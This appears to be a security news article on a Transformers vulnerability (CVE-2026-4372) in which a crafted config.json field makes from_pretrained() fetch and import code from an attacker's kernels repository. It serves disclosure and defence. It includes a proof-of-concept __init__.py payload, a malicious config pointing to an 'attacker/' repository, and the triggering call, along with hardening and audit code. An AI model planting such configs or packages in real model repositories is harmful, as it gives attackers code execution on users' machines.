
Hugging Face Transformers Security Vulnerability Enables Remote Code Execution


Security Flaw Discovered in Hugging Face Transformers Poses Severe Risks to Machine Learning Pipelines

A significant security vulnerability, tracked as CVE-2026-4372, has been identified in Hugging Face Transformers. The flaw exposes a large number of machine learning workflows to silent remote code execution (RCE) via malicious model configurations, and it has raised alarms among security professionals and organizations that depend on the machine learning ecosystem.

Discovery and Implications

The vulnerability was uncovered by Yotam Perkal, a researcher at Pluto Security, who detailed how the flaw allows attackers to execute arbitrary code on a victim’s machine. This is achieved through a deceptive mechanism where users are tricked into loading a compromised model using the standard from_pretrained() API. Notably, this exploitation can occur without the need for trust_remote_code=True or any direct user interaction, making it particularly insidious.

The flaw affects Transformers versions 4.56.0 through 5.2.x, particularly when the optional kernels package is also installed. The vulnerable code path was introduced in August 2025 and remained a risk for almost six months before being patched in version 5.3.0, released in March 2026. Given how widely the library is used (over 2.2 billion installations and approximately 146 million downloads per month), this exposure represents a serious supply chain risk for AI pipelines, enterprise machine learning systems, and academic research environments.

Technical Underpinnings of the Vulnerability

At the core of this vulnerability lies the unsafe deserialization of untrusted configuration data. When a model is loaded, the library processes a config.json file, dynamically assigning all key-value pairs using Python’s setattr() function. Unfortunately, this process includes internal attributes that should not be user-controlled. For instance, the internal attribute _attn_implementation_internal specifies which attention kernel implementation to load. When manipulated by an attacker, this field can redirect to a malicious Hugging Face repository containing nefarious Python code.

The situation escalates when the interaction with the kernels package is considered. If the value of _attn_implementation_internal matches the "owner/repo" repository pattern, the library automatically downloads and imports the corresponding package. This import happens without any sandboxing, signature verification, or user notification, so a plain configuration field becomes a code execution mechanism.
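The following is an added example and is not code from Transformers or from the researcher's write-up. It models only the behaviour the two paragraphs above describe: every key in config.json is applied to the config object with setattr(), and a value shaped like "owner/repo" in _attn_implementation_internal is what the kernels integration would try to fetch. The vulnerable loop is shown beside a hardened one that refuses internal keys; the denylist contents, the stricter "reject any underscore-prefixed key" rule, and the placeholder repository id are assumptions of the example. Nothing here downloads or imports anything.

```python
import re

# Shape of a Hugging Face repository id, as used by the kernels package.
OWNER_REPO = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*/[A-Za-z0-9][A-Za-z0-9._-]*$")

# Hypothetical denylist of config keys that must never be taken from config.json.
# The real 5.3.0 denylist may differ; the only entry here is the one the article names.
INTERNAL_DENYLIST = frozenset({"_attn_implementation_internal"})


class VulnerableConfig:
    """Pre-5.3.0 behaviour as the article describes it: every key is applied with setattr()."""

    def __init__(self, **kwargs):
        # Normally chosen by the library at load time, not by whoever wrote config.json.
        self._attn_implementation_internal = None
        for key, value in kwargs.items():
            setattr(self, key, value)


class HardenedConfig:
    """Same loop, but internal keys are refused instead of applied.

    Keys on the denylist and (a stricter choice made in this example) any other
    key starting with an underscore are recorded in `rejected` and never assigned.
    """

    def __init__(self, **kwargs):
        self._attn_implementation_internal = None
        self.rejected = {}
        for key, value in kwargs.items():
            if key in INTERNAL_DENYLIST or key.startswith("_"):
                self.rejected[key] = value
                continue
            setattr(self, key, value)


def would_trigger_kernel_download(config) -> bool:
    """True if the attention field now names an external repository.

    Built-in implementations such as "sdpa" or "eager" contain no slash and do
    not match; an "owner/repo" value is what the kernels integration would fetch.
    """
    value = getattr(config, "_attn_implementation_internal", None)
    return isinstance(value, str) and OWNER_REPO.match(value) is not None


def load_config(raw: dict, hardened: bool):
    """Simulate loading a parsed config.json with either behaviour."""
    cls = HardenedConfig if hardened else VulnerableConfig
    return cls(**raw)


# Constructed config.json contents carrying the field the article describes.
# "untrusted-owner/untrusted-kernel" is a placeholder, not a real repository.
UNTRUSTED_CONFIG = {
    "model_type": "llama",
    "_attn_implementation_internal": "untrusted-owner/untrusted-kernel",
    "vocab_size": 32000,
}

if __name__ == "__main__":
    for hardened in (False, True):
        cfg = load_config(UNTRUSTED_CONFIG, hardened)
        label = "hardened" if hardened else "vulnerable"
        print(f"{label}: external kernel download would be triggered ->",
              would_trigger_kernel_download(cfg))
```

The point of the side-by-side is that the fix is not in the kernels code path at all: once the config object refuses to let config.json set an internal attribute, the "owner/repo" value never reaches the code that would act on it.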

Real-World Attack Scenarios

In practical attack scenarios, a malicious user can upload a harmful model with a specially crafted config.json file that includes the compromised field. When the victim executes a routine command, such as AutoModelForCausalLM.from_pretrained("attacker/model"), the library silently fetches and executes the attacker’s code during the model’s initialization phase. This occurs even if the user has explicitly disabled the trust_remote_code option, fundamentally undermining the security assumptions that developers and organizations depend on.

To illustrate the risk, consider a simplified proof of concept demonstrating how code execution can be triggered using a malicious kernel package:

# Malicious __init__.py hosted in attacker-controlled HF repo
import os
def exploit():
    with open("/tmp/pwned.txt", "w") as f:
        f.write("System compromised\n")
    os.system("id > /tmp/user_info.txt")
exploit()

The corresponding config.json could look like this:

{
  "model_type": "llama",
  "_attn_implementation_internal": "attacker/malicious-kernel",
  "vocab_size": 32000
}

When executed as follows:

from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained("attacker/malicious-model")

The payload will execute automatically, leaving traces such as /tmp/pwned.txt on the victim’s system.

Risks of Data Compromise

Successful exploitation can let attackers steal sensitive data, including AWS credentials, SSH keys, API tokens, and environment variables. It also gives them opportunities to establish persistence, move laterally within cloud infrastructure, and compromise CI/CD pipelines. The threat is especially pronounced in GPU-enabled settings and enterprise ML platforms, where the kernels dependency is commonly installed.

Security researchers have drawn comparisons to previous vulnerabilities in the machine learning ecosystem. The issue echoes past flaws such as PyTorch's weights_only bypass (CVE-2025-32434), where a "safe mode" failed to prevent unwanted code execution. This reflects a recurring design flaw in AI frameworks: untrusted model artifacts are treated as benign data rather than as executable inputs.

Resolution and Mitigation Strategies

The vulnerability has been addressed in version 5.3.0 of Transformers, which introduces a denylist to prevent unsafe internal attributes from being adjusted via configuration files. The patch also enforces the requirement of trust_remote_code=True for external kernel loading. Users are strongly encouraged to upgrade their libraries immediately and to refrain from loading untrusted models in sensitive environments.

In light of this incident, organizations are urged to treat all model-loading operations as potential surfaces for code execution. Policies should enforce sandboxing, restrict outbound network access, and isolate credentials from machine learning workloads. This incident serves as a stark reminder of the escalating risks associated with machine learning supply chains, which are increasingly becoming high-value targets for malicious actors.
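As an added example of treating model loading as a code execution surface, the following audit script is not part of Transformers or of any published advisory tooling. It walks a local model directory, parses every config.json before anything is loaded, and flags the condition the article describes: an internal attribute (in particular _attn_implementation_internal) whose value names an external "owner/repo" kernels repository. The key list, the placeholder repository id and the sample model directories are constructed for the example; the script never imports or executes anything from the models it inspects.

```python
import json
import re
import tempfile
from pathlib import Path

# Shape of a Hugging Face repository id, as used by the kernels package.
OWNER_REPO = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*/[A-Za-z0-9][A-Za-z0-9._-]*$")

# The one key the article names; extend this from your own library version's internals.
KERNEL_REPO_KEYS = frozenset({"_attn_implementation_internal"})


def audit_config(config: dict) -> list[str]:
    """Return findings for one parsed config.json (an empty list means clean)."""
    findings = []
    for key, value in config.items():
        if key in KERNEL_REPO_KEYS and isinstance(value, str) and OWNER_REPO.match(value):
            findings.append(f"{key} names an external kernel repository: {value!r}")
        elif key.startswith("_"):
            # Any underscore-prefixed key is an internal attribute a model author has
            # no business setting; report it even if the value looks harmless.
            findings.append(f"internal attribute {key!r} present in config.json")
    return findings


def audit_model_tree(root: Path) -> dict[str, list[str]]:
    """Audit every config.json under root; keys are paths relative to root."""
    results = {}
    for path in sorted(root.rglob("config.json")):
        rel = path.relative_to(root).as_posix()
        try:
            data = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            results[rel] = [f"unreadable config.json: {exc}"]
            continue
        if not isinstance(data, dict):
            results[rel] = ["config.json is not a JSON object"]
            continue
        results[rel] = audit_config(data)
    return results


def safe_to_load(results: dict[str, list[str]]) -> bool:
    """Gate for a loading pipeline: proceed only when no config raised a finding."""
    return all(not findings for findings in results.values())


def build_sample_tree(base: Path) -> Path:
    """Write two constructed model directories: one benign, one carrying the field."""
    benign = {"model_type": "llama", "vocab_size": 32000, "hidden_size": 4096}
    suspicious = {
        "model_type": "llama",
        # Placeholder repository id, not a real one.
        "_attn_implementation_internal": "untrusted-owner/untrusted-kernel",
        "vocab_size": 32000,
    }
    for name, cfg in (("benign-model", benign), ("suspicious-model", suspicious)):
        model_dir = base / name
        model_dir.mkdir(parents=True, exist_ok=True)
        (model_dir / "config.json").write_text(json.dumps(cfg, indent=2), encoding="utf-8")
    return base


def run_demo() -> dict[str, list[str]]:
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_model_tree(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    report = run_demo()
    for rel, findings in report.items():
        print(rel, "->", findings or "clean")
    print("safe to load:", safe_to_load(report))
```

Run it against a real download cache or artifact store by calling audit_model_tree on that directory instead of the constructed one, and wire safe_to_load into the step that precedes from_pretrained(); a finding should block the load rather than merely log it.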

For further information and updates, organizations and individuals can follow news outlets dedicated to cybersecurity and technology advancements.
